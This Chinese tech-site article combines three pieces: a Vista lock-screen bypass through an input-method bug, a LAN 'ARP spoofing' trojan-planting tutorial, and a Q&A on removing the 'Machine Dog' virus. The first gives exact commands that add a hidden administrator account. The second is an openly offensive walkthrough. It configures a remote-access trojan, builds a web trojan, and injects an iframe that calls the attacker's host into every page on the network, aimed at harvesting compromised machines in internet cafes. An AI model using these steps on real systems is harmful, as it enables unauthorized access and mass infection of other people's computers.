Vista的一大卖点就是其可靠的安全性,UAC、内置防火墙等功能把Vista打造得如同铜墙铁壁。难道真的不可被攻破吗?其实利用输入法漏洞,无需输入密码,就可以直接以系统管理员的权限登录系统,执行任意操作。如此低级但严重的漏洞到底是如何在Vista上重演的呢?
出现这样低级的漏洞其实也不能完全怪Vista,存在漏洞的《极点五笔输入法》才是罪魁祸首。问题出在其6.0版本(2007.2.26.0.98)中,当Vista系统安装上该版本的《极点五笔输入法》后,就像两种独立的化学物质,本身不会有反应,但当两者融合在一起的时候,就会产生剧烈的化学反应,低级的漏洞由此诞生。
漏洞触发条件
这个漏洞的危害性很大,但是要触发这个漏洞,也是需要有一定条件的:
条件1:6.0版本(2007.2.26.0.98)的《极点五笔输入法》输入法。这是必要前提,只有该版本的输入法存在此漏洞,最新的版本已经填补了漏洞。此外,Google输入法最初的1.0版本也存在此漏洞。
条件2:系统处于锁定状态(按“Windows+L”组合键实现)。当Vista启动到登录界面时,是不会触发漏洞的,只有当系统处于锁定状态时,漏洞才会被激活。
满足这两点后,我们就可以轻松绕过Vista的密码验证,直接进入系统了。下面我们来对这个漏洞进行测试。wwW.ItCOmpuTER.COm.cN
绕过系统验证登录
Step1:假设当前登录界面处于锁定状态下,点击界面左下角的输入法选择按钮,在出现的菜单中选择《极点五笔输入法》。
Step2:点击一下登录界面的空白处,这时会出现《极点五笔输入法》的输入法状态条,在上面点右键,在出现的菜单中依次选择“输入法设置→设置另存为”。
Step3:在登录界面会弹出一个文件保存对话框,在这个对话框中我们可以浏览硬盘中的任意文件,包括创建和删除文件(图2)!
Step4:在对话框中操作文件很不方便,况且并不能算是真正的入侵,因此我们可以利用漏洞创建一个具有管理员权限的账户,用这个账户进入系统。
在对话框的地址栏中输入“c:\windows\system32\net.exe user hacker 123456 /add”(图3),输入完毕后点击一下旁边的“前进”按钮,这时会有一个“命令提示符”窗口一闪而过。虽然登录界面看起来没有什么变化,但我们已经在系统中创建了一个名为hacker,密码为123456的普通账户。
Step5:接下来我们将它提升为系统的管理员,再次在地址栏中输入“net localgroup administrators hacker /add”并回车,仍旧是一个“命令提示符”窗口一闪而过。OK,现在我们已经是系统的管理员了,关闭当前的对话框窗口,点击登录界面上的“切换用户”按钮。接下去请相信你的眼睛,hacker账户已经俨然出现在了登录界面上(图4)。下面就不用多说了,用hacker账户登录,在Vista系统中尽情的爽吧。
至此,我们已经成功绕过了Vista的密码验证,成为了系统的管理员。而入侵的过程只有短短的几个步骤,甚至不用借助任何工具,可见这个漏洞一旦形成,危害十分巨大。那么对于这个漏洞,我们该如何防范呢?
漏洞防范技巧
在上文中我们已经提到漏洞形成的两个必要条件,因此只要我们能解决其中一条,即可防范漏洞。
方法1:升级《极点五笔输入法》的版本,目前最新版本为6.1正式版,只要升级到最新的版本就可以填补漏洞,这是最简单也是最有效的方法。如果你使用的是其他的输入法程序,也建议进行一下升级,因为Vista系统作为一个新系统,不少输入法都还没做好准备,或多或少都可能存在一些潜在的瑕疵。
方法2:如果没有条件升级输入法版本,也没有关系,只要不对当前用户进行“锁定”操作就可以了,我们也可以用“切换用户”代替,效果是一样的,但是“切换用户”后的登录界面不存在漏洞。
总结
在Windows 2000时代,也出现了一些类似的输入法漏洞,为什么输入法会频繁出现这种问题呢?主要还是输入法本身设计的问题,由于输入法的帮助文件能执行CMD命令,可以被用来添加管理员账户,导致黑客绕过登录验证。
很多用户都有不升级输入法的习惯,一旦该版本的输入法出现漏洞,后果就会很严重。建议大家定期更新自己的输入法,避免被人偷偷登录。
如何在局域网挂arp木马
网页挂马最难的就是传播了,小网站易入侵但是访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获的肉鸡就会成几何倍数增长。
局域网ARP欺骗挂马的好处如下:无需入侵网站,只要你的主机处于局域网中即可,这是它最大的优点;收获的肉鸡多多,短时间内可以收获数十台甚至上百台肉鸡,类似网吧这样由上百台电脑组成的局域网是最好的挂马场所;局域网内的用户访问任何网站都会中木马。看了上面的介绍,各位是不是已经蠢蠢欲动了?
第一步:配置木马服务端
我们以《黑洞》木马为例。运行《黑洞》木马的Client.exe文件,进入Client.exe的主界面后,点击“文件→创建DLL插入版本服务端程序”。
进入服务端程序的创建界面后,首先勾选“Win NT/2000/XP/2003下隐藏服务端文件、注册表、进程和服务”,然后切换到“连接选项”标签,在“主机”一栏中填入本机的公网IP地址,端口可以保持默认的“2007”。最后在“连接密码”处填入用来连接对方的密码,例如123456。设置完成后点击“生成”按钮,将木马服务端保存为muma.exe。
第二步:生成网页木马
既然是挂马,那当然缺不了网页木马了。这里我们用“MS07-33网马生成器”为例。运行“MS07-33网马生成器”,在“网马地址”文本框中输入木马所在路径,由于等会我们要自行架设HTTP服务,所以这里应该填入“http://192.168.0.2/muma.exe“,其中192.168.0.2是本机在局域网中的IP地址。点击“生成网马”按钮即可生成网马hackll.htm。
第三步:开启本机HTTP服务
要让局域网中的其他主机能够访问到我们的网马,就要开启本机的Http服务。下载Baby Web Server,这是一款简单的Web服务器软件,下载后直接运行,在其主界面中点击“服务→设置”。
将“网页目录”设置为网页木马所在的地方,例如C盘根目录“C:\“。点“确定”回主界面,然后再点“Start”按钮开启本机的Http服务。记住要将木马服务端和网页木马放到C盘根目录。
第四步:局域网挂马
最后该请我们的主角出场了,就是上文中提到的小工具,这个工具叫zxARPs,是一个通过ARP欺骗实现局域网挂马的工具。在使用zxARPs前我们要安装WinPcap,它是网络底层驱动包,没有它zxARPs就运行不了。
安装好后将zxARPs放到任意目录,然后运行“命令提示符”,进入zxARPs所在的目录,然后输入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert “<iframe src=‘http://192.168.0.2/hackll.htm’ width=0 height=0>”。回车后挂马就成功了。
从现在开始,局域网中的用户无论访问什么网站,都会运行我们的网页木马,因为zxARPs在用户打开网页的同时已经将挂马代码插入到正常网页中了。
如何清除机器狗病毒
病人:我是一名网管,最近在网吧上班时碰到一件烦心事。网吧里的电脑经常一次性感染七八种病毒(检查发现,主要有“cmdbc木马”、“AVPSrv”、“Torjan.Diskman”等),清除后不用多久又会自动生成,就像牛皮癣一样。我们网吧的电脑可都是装有还原卡的啊,怎么还会感染病毒呢?
医生:根据你的描述,这应该是近段时间比较流行的“机器狗”病毒,这种病毒类似于“下载者”,会将大量的木马和病毒下载到你的电脑中,其下载的木马主要就是你刚才提到的那几种病毒。
最重要的是,“机器狗”病毒是目前对还原软件、还原卡破坏能力最强的病毒。“机器狗”目前可以破坏冰点还原、影子系统等还原软件,还能破坏三茗、小哨兵等硬件还原卡。被破坏的还原卡会失去作用,让系统彻底暴露在病毒下。
“机器狗”怎么突破还原卡
病人:谢谢医生的解答,我现在对这个“机器狗”病毒有点了解了,可我还想知道它是怎么破解还原卡的?
医生:“机器狗”的运作流程并不复杂,比起熊猫烧香、AV终结者来说要简单不少。运行后首先会替换系统的Userinit.exe文件,Userinit.exe是Windows操作系统的一个关键进程,用于管理不同的启动顺序,例如用于建立网络链接和Windows壳的启动。病毒利用Userinit.exe的目的是实现隐蔽启动。
接着在Windows\system32\drivers文件夹中生成一个名为Pcihdd.sys的驱动文件,病毒正是借助这个驱动文件来实现还原软件和还原卡破解的。我们知道还原软件和还原卡之所以能够保护硬盘数据,是因为它具有很高的权限,能够夺取硬盘的控制权,在系统启动之前,将硬盘中的数据还原。
而Pcihdd.sys这个文件会和还原软件或还原卡抢夺硬盘的控制权,大部分还原软件和还原卡的控制权都会被Pcihdd.sys夺取,它们就失去了还原数据的能力,这样病毒就可以避开还原卡在硬盘中安营扎寨了。
彻底清除“机器狗”病毒
病人:“机器狗”果然是一个难缠的病毒,尤其是像我这样的网吧管理员,刚解决了烦人的“熊猫烧香”,现在来了个更狠的,真是不胜其烦。请问我该如何清除“机器狗”病毒?
医生:清除“机器狗”的方法比较简单,操作步骤如下:
第一步:用正常的Userinit.exe文件替换被修改的Userinit.exe文件。首先新建一个记事本,输入如下内容:
@echo off
taskkill /f /im userinit.exe
del userinit.exe /f/q/a
将这个记事本文件保存为kill.bat,双击运行。然后从其他干净的电脑中拷贝一份Userinit.exe文件,将它放到system32目录中。
第二步:删除pcihdd.sys文件,该文件位于Windows\system32\drivers文件夹中。用记事本打开位于Windows\system32\drivers\etc的HOSTS文件,在最后添加这样一行:127.0.0.1 www.tomwg.com,修改完后保存文件。
第三步:用《360安全卫士》配合杀毒软件清除系统中残留的盗号木马病毒。
第四步:为了更好地预防“机器狗”病毒,我们可以用批处理将Pcihdd.sys 的文件夹设置为禁止修改。批处理关键代码如下:
md %systemroot%\system32\drivers\pcihdd.sys
cacls %systemroot%\system32\drivers\pcihdd.sys/e/p everyone:n
cacls %systemroot%\system32\userinit.exe /e /p everyone:r
总结
还原卡和还原软件并不是万能的,如果仅希望依靠它们来避免中毒不太现实。这段时间病毒技术发展得较快,网管和普通用户一定要多加关注,以掌握最新病毒的清除方法。
From:http://www.itcomputer.com.cn/Article/Network/201309/385.html